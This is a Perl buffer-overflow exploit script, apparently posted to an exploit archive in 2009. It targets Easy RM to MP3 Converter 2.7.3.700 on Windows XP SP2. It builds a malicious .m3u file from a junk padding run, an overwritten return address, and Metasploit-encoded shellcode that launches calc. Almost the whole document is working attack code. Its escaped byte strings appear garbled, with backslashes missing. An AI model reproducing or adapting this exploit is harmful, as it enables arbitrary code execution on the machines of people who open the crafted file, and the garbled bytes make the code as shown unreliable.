EasyRm2mp3_calc.pl.txt
Posted on 13 December 2009
#!/usr/bin/perl # Easy RM to MP3 Converter 2.7.3.700 (.m3u) File WinXP Sp2 Buffer Overflow Exploit # Author: Vinod Sharma # Download : http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe # Tested : Windows XP SP2 (En) # Thanks to exploit-db # Originally published at : http://securitygyan.com/2009/12/10/easyrmtomp3-m3ufile-exploit/ #Vulnerability discovered by CYBER-ZONE #Advisory:http://secunia.com/advisories/34653 my $file= "exploit.m3u"; my $junk= "x41" x 26059; my $eip= pack('V', 0x01a8f23a); my $shellcode= "x90" x 25; #/* #* windows/exec - 223 bytes #* http://www.metasploit.com #* Encoder: x86/shikata_ga_nai #* EXITFUNC=thread, CMD=calc #*/ $shellcode = $shellcode. "x31xc9xdaxd4xb1x33xbdxecx71x94xdexd9x74x24xf4". "x5fx31x6fx15x03x6fx15x83x2bx75x76x2bx4fx9exff". "xd4xafx5fx60x5cx4ax6exb2x3ax1fxc3x02x48x4dxe8". "xe9x1cx65x7bx9fx88x8axccx2axefxa5xcdx9ax2fx69". "x0dxbcxd3x73x42x1exedxbcx97x5fx2axa0x58x0dxe3". "xafxcbxa2x80xedxd7xc3x46x7ax67xbcxe3xbcx1cx76". "xedxecx8dx0dxa5x14xa5x4ax16x25x6ax89x6ax6cx07". "x7ax18x6fxc1xb2xe1x5ex2dx18xdcx6fxa0x60x18x57". "x5bx17x52xa4xe6x20xa1xd7x3cxa4x34x7fxb6x1ex9d". "x7ex1bxf8x56x8cxd0x8ex31x90xe7x43x4axacx6cx62". "x9dx25x36x41x39x6execxe8x18xcax43x14x7axb2x3c". "xb0xf0x50x28xc2x5ax3exafx46xe1x07xafx58xeax27". "xd8x69x61xa8x9fx75xa0x8dx40x94x61xfbxe8x01xe0". "x46x75xb2xdex84x80x31xebx74x77x29x9ex71x33xed". "x72x0bx2cx98x74xb8x4dx89x16x5fxdex51xf7xfax66". "xf3x07"; $shellcode = $shellcode."x90" x 25; open($FILE, ">$file"); print($FILE $junk.$eip.$shellcode); close($FILE); print("exploit created successfully");
